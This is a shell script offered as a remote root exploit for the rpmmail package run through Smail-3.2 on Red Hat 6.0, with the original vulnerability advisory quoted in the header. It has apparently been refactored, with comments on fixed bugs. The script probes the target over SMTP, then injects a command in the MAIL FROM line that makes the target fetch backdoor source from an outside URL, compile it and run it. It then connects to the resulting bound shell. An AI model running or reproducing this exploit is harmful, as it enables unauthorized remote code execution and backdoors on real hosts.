#!/bin/sh
# remote root exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com]
#  greets to: 
#   all of gH, "Brock Tellier" for discovering the hole.
#  special greets to:
#   icesk, mosthated, elux, rhodie, and the rest of #bifemlinux @ undernet
# ---- Brock Tellier's original advisory
# Greetings,
#
# A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
# Extra Applications CD.  The potential compromise for this bug could be remote
# or local root or simply remote command execution as "nobody" or similar, 
# depending on your system configuration.
#
# By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
# get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
# to system(3) any command you wish. The command executed does not necessarily
# run with root privileges, because bash 2 drops privileges when euid != uid of
# the caller. system(3) runs /bin/sh -c, and on some Linux systems, such as
# SuSE 6.2, /bin/sh is by default a symlink to bash version 2 (can anyone
# verify this?). From the system(3) man page:
#
#      system() will not, in fact, work properly from  programs  
#       with suid or sgid privileges on systems on which
#      /bin/sh is bash version 2, since bash 2  drops  privileges
#       on  startup.   (Debian uses a modified bash which does not
#       do this when invoked as sh.)
#  
# Thus some systems with rpmmail installed are vulnerable to local/remote root, 
# all others to remote command execution as an unpriv'd user.
# --- end Brock's text

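# URL of the backdoor source that the target is told to fetch and compile.
# It must be reachable *from the target*; the host below is the one from the
# original 2000 release and may no longer serve the file, so point this at a
# copy you control. (The original value carried a trailing space inside the
# quotes, which would have been sent as part of the URL.)
BACKDOOR="http://meltingpot.fortunecity.com/rundberg/521/blackhole.c"
readonly BACKDOOR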

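set -u

# Print a diagnostic to stderr and exit non-zero (the original exited 0 on
# every failure, which made the script useless from a wrapper).
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

target=${1-}
if [ -z "$target" ]; then
  printf 'usage: %s <host>\n' "$0" >&2
  exit 2
fi

# Both external tools are mandatory; `command -v` is the portable check
# (the original's unquoted `which` comparison was a syntax error when nc
# was missing).
for tool in nc host; do
  command -v "$tool" >/dev/null 2>&1 || die "this script requires $tool"
done

[ -n "${BACKDOOR-}" ] || die "BACKDOOR is not set"

# Sanity check that the name resolves before opening any SMTP session.
# The address itself is not needed: nc resolves the name again on connect.
if ! host "$target" | grep -iF -- "$target" | grep -qi "has address"; then
  die "unable to obtain address for $target"
fi

# Server output is captured in a private temp file instead of ./vuln.tmp,
# and removed on every exit path (the original only cleaned up on success
# and opened the same file twice for stdout and stderr).
tmp=$(mktemp) || die "mktemp failed"
trap 'rm -f -- "$tmp"' EXIT

# Feed one scripted SMTP conversation to the target's port 25.
# Each line is followed by a one-second pause so the server answers in
# order; everything it sends back lands in "$tmp".
smtp_chat() {
  {
    sleep 1
    for line; do
      printf '%s\n' "$line"
      sleep 1
    done
  } | nc -w 4 "$target" 25 >"$tmp" 2>&1
}

printf '= remote exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com] =\n'
printf '[**]: Making sure the system is vulnerable.. '
smtp_chat "EXPN rpmmail"
# The server is considered vulnerable when EXPN answers 250 and the
# expansion shows rpmmail being invoked with -c.
if ! grep -- '250' "$tmp" | grep -q 'rpmmail -c'; then
  printf 'no!\n'
  exit 1
fi
printf 'yes!\n'

printf '[**]: Setting up our tcp bound shell.. '
# Envelope sender carrying the command rpmmail is expected to hand to
# system(3). It needs lynx and gcc on the target. The original wrote this
# in single quotes, so $BACKDOOR was sent literally and expanded (to
# nothing) on the remote side; double quotes fix that. The "\x20" and "&;"
# sequences are reproduced verbatim from the original -- how rpmmail/smail
# turns them into spaces and a background job is not shown here, so verify
# against the target before relying on it.
sender="MAIL FROM: ;lynx\x20-dump\x20${BACKDOOR}\x201>unf.c\x202>unf.c\x20;gcc\x20-o\x20unf\x20unf.c\x20;./unf\x20&;"
smtp_chat "$sender" "RCPT TO: rpmmail" "DATA" "unf" "." "quit"
if ! grep -qi " 250 Mail accepted" -- "$tmp"; then
  printf 'failed!\n'
  exit 1
fi
printf 'success!\n'

printf '[**]: Attempting to obtain access.. '
# Port 5300 is taken from the original script; presumably what blackhole.c
# binds -- confirm against its source. nc stays attached until the
# session ends.
nc -w 3 "$target" 5300
printf 'done.\n'

# No `killall -9 nc` here: the original killed every nc process on the
# local box, including ones belonging to other users. Every nc above runs
# in the foreground and has already exited; the temp file goes via the trap.
printf '[**]: Cleaning up local mess.. done.\n'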


#                 www.hack.co.za           [2000]#